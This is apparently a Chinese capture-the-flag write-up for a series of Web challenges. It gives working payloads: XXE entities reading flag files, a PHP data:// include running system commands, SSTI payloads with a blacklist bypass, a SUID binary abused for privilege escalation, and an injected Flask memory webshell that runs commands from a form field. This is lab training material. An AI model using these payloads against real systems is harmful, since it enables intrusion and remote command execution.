Web

0 Web入门指北

jsfuck编码控制台运行即可

10 第十章天机符阵

xxe注入
payload:

<!DOCTYPE data [
  <!ENTITY abc SYSTEM "file:///var/www/html/flag.txt">
]>
<解析>&abc;</解析>

16 第十六章昆仑星途

src：

<?php
error_reporting(0);
highlight_file(__FILE__);

include($_GET['file'] . ".php");

payload: data伪协议拼接后.php无影响

1	/?file=data://text/plain,<?php system('whoami') ?>

Moe笑传之猜猜爆

js代码审计，可以得知随机数生成并且储存为一个参数randomNumber，直接在控制台里输入这个参数名字即可获得随机数字。

13 第十三章通幽关·灵纹诡影

图片木马 bp修改文件头即可

10 第十章天机符阵_revenge

xxe注入
payload:

<!DOCTYPE data [
  <!ENTITY abc SYSTEM "file:///flag.txt">
]>
<解析>&abc;</解析>

14 第十四章御神关·补天玉碑

.htaccess文件上传强制解析文件为php

20 第二十章幽冥血海·幻语心魔

无限制SSTI

摸金偶遇FLAG，拼尽全力难战胜

方法1

通过分析js源码改变游戏时间第 87 行找到了控制挑战时间的变量：var limitChallengeTime = 3;，在这个语句的下一行设置一个断点，然后刷新网页。
完成游戏后分析网络选项卡得知挑战目录和提交目录
payload:

import requests

session = requests.Session()

resp = session.get("http://localhost:80/get_challenge?count=1")

challenge = resp.json()

challenge['answers'] = challenge['numbers']
# del challenge['numbers']
challenge.pop('numbers')

resp = session.post("http://localhost:80/verify", json=challenge)
print(resp.text)

方法2(待知)

使用 selenium 自动化控制浏览器完成本题的任务。

from selenium import webdriver # 若脚本启动时卡死请尝试科学上网，因为要下载某些资源
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import StaleElementReferenceException, TimeoutException, NoSuchElementException
import time

dict={
    "0": "━━━━━",
    "1": "·━━━━",
    "2": "··━━━",
    "3": "···━━",
    "4": "····━",
    "5": "·····",
    "6": "━····",
    "7": "━━···",
    "8": "━━━··",
    "9": "━━━━·"
}
# 初始化驱动
driver = webdriver.Chrome()

# 加载页面
url = 'http://127.0.0.1:9801/'

morse_codes=[]

nums=[]
#获取数字列表
def get_morse_code(morse_codes):
    nums=[]
    for morse in morse_codes:
        for num, ms in dict.items():
            if morse == ms:
                nums.append(int(num))
    print("nums:",nums)
    return nums

def input1(nums, button_selectors):
    for i, num in enumerate(nums):
        success = click_button_safely(num, button_selectors)
        if success:
            print(f"第{i+1}次输入{num}，成功")
        else:
            print(f"第{i+1}次输入{num}，失败")
        time.sleep(0.1)

def printhtml():
    html_content = driver.page_source
    print("网页内容： ",html_content)

def get_button_selectors():
    # 返回按钮选择器而不是元素引用，避免过期引用问题
    selectors = {
        0: '#inputContent > div.inputContentBtnArea > div:nth-child(11)',
        1: '#inputContent > div.inputContentBtnArea > div:nth-child(7)',
        2: '#inputContent > div.inputContentBtnArea > div:nth-child(8)',
        3: '#inputContent > div.inputContentBtnArea > div:nth-child(9)',
        4: '#inputContent > div.inputContentBtnArea > div:nth-child(4)',
        5: '#inputContent > div.inputContentBtnArea > div:nth-child(5)',
        6: '#inputContent > div.inputContentBtnArea > div:nth-child(6)',
        7: '#inputContent > div.inputContentBtnArea > div:nth-child(1)',
        8: '#inputContent > div.inputContentBtnArea > div:nth-child(2)',
        9: '#inputContent > div.inputContentBtnArea > div:nth-child(3)'
    }
    return selectors

def click_button_safely(num, selectors, max_retries=3):
    # 每次点击前重新获取元素，避免过期引用，支持重试机制
    for attempt in range(max_retries):
        try:
            button = WebDriverWait(driver, 5).until(
                EC.element_to_be_clickable((By.CSS_SELECTOR, selectors[num]))
            )
            button.click()
            return True
        except (StaleElementReferenceException, TimeoutException, NoSuchElementException) as e:
            print(f"点击按钮 {num} 第 {attempt + 1} 次尝试失败: {type(e).__name__}")
            if attempt < max_retries - 1:
                time.sleep(0.5)  # 等待一下再重试
            else:
                print(f"点击按钮 {num} 最终失败: {e}")
                return False
        except Exception as e:
            print(f"点击按钮 {num} 发生未知错误: {e}")
            return False

def main():
    driver.get(url)
    time.sleep(2)
    start_bottom = WebDriverWait(driver, 10).until(
        EC.element_to_be_clickable((By.ID, 'decipherComputerChallengeStartBTN'))
    )
    start_bottom.click()
    print("开始挑战！")
    time.sleep(0.2)
    
    # 获取按钮选择器而不是元素引用
    button_selectors = get_button_selectors()

    content_item = WebDriverWait(driver, 10).until(
        EC.presence_of_element_located((By.CSS_SELECTOR, '#leftPanel > div.codeShow > div.codeContent'))
    )
    clean_morse_code = content_item.text.replace('\n', '').replace(' ', '')
    print("clean_morse_code:", clean_morse_code)
    morse_codes=[clean_morse_code[i:i+5] for i in range(0, len(clean_morse_code), 5)]
    print("morse_code：",morse_codes)

    for morse in morse_codes:
        for num, ms in dict.items():
            if morse == ms:
                nums.append(int(num))
    print("nums:",nums)

    # 使用安全的点击方法，每次都重新获取元素
    for i, num in enumerate(nums):
        success = click_button_safely(num, button_selectors)
        if success:
            print(f"第{i+1}次输入{num}，成功")
        else:
            print(f"第{i+1}次输入{num}，失败")
        time.sleep(0.1)
    
    time.sleep(10)
    driver.quit()

if __name__ == '__main__':
    main()

11 第十一章千机变·破妄之眼

爆破 302跳转 php://filter 伪协议
注意若用py脚本爆破无法响应302 必须用bp

15 第十五章归真关·竞时净魔

条件竞争

21 第二十一章往生漩涡·言灵死局

简单限制ssti 用fenjing绕过
src：

from flask import Flask, request, render_template, render_template_string
app = Flask(__name__)

blacklist = ["__", "global", "{{", "}}"]

@app.route('/')
def index():
    if 'username' in request.args or 'password' in request.args:
        username = request.args.get('username', '')
        password = request.args.get('password', '')

        if not username or not password:
            login_msg = """
            <div class="login-result" id="result">
                <div class="result-title">阵法反馈</div>
                <div id="result-content"><div class='login-fail'>用户名或密码不能为空</div></div>
            </div>
            """
        else:
            login_msg = render_template_string(f"""
            <div class="login-result" id="result">
                <div class="result-title">阵法反馈</div>
                <div id="result-content"><div class='login-success'>欢迎：{username}</div></div>
            </div>
            """)

            for blk in blacklist:
                if blk in username:
                    login_msg = """
                    <div class="login-result" id="result">
                        <div class="result-title">阵法反馈</div>
                        <div id="result-content"><div class='login-fail'>Error</div></div>
                    </div>
                    """
    else:
        login_msg = ""

    return render_template("index.html", login_msg=login_msg)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

22 第二十二章血海核心·千年手段

无回显ssti

方法1

通过static/回显

1	{{lipsum.__globals__['os']['popen']('mkdir static; whoami > ./static/out.txt')}}

find / -perm -4000 提权注意到/usr/bin/rev与正常不同通过base64、xxd、hexdump等方式读取/usr/bin/rev然后逆向

#include <unistd.h>
#include <string.h>

int main(int argc, char **argv) {

    for(int i = 1; i + 1 < argc; i++) {
        if (strcmp("--HDdss", argv[i]) == 0) {
            execvp(argv[i + 1], &argv[i + 1]);
        }
    }

    return 0;
}

payload:

1	rev --HDdss whoami

方法2

通过打内存马回显

{{url_for.__globals__['__builtins__']['eval']("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.form.get('cmd') and exec(\"global CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(request.form.get(\'cmd\')).read())\")==None else resp)",{'request':url_for.__globals__['request'],'app':url_for.__globals__['sys'].modules['__main__'].__dict__['app']})}}

后续相同

这是…Webshell？

src：

<?php
highlight_file(__FILE__);
if(isset($_GET['shell'])) {
    $shell = $_GET['shell'];
    if(!preg_match('/[A-Za-z0-9]/is', $_GET['shell'])) {
        eval($shell);
    } else {
        echo "Hacker!";
    }
}
?>

无字母数字webshell
异或自增取反都可以

这是…Webshell?_revenge

src:

<?php
highlight_file(__FILE__);

if (isset($_GET['shell'])) {
    $shell = $_GET['shell'];
    if (strlen($shell) > 30) {
        die("error: shell length exceeded");
    }
    if (preg_match("/[A-Za-z0-9_$]/", $shell)) {
        die("error: shell not allowed");
    }
    eval($shell);
}

详见https://www.freebuf.com/articles/network/279563.html

Web

0 Web入门指北

10 第十章 天机符阵

16 第十六章 昆仑星途

Moe笑传之猜猜爆

13 第十三章 通幽关·灵纹诡影

10 第十章 天机符阵_revenge

14 第十四章 御神关·补天玉碑

20 第二十章 幽冥血海·幻语心魔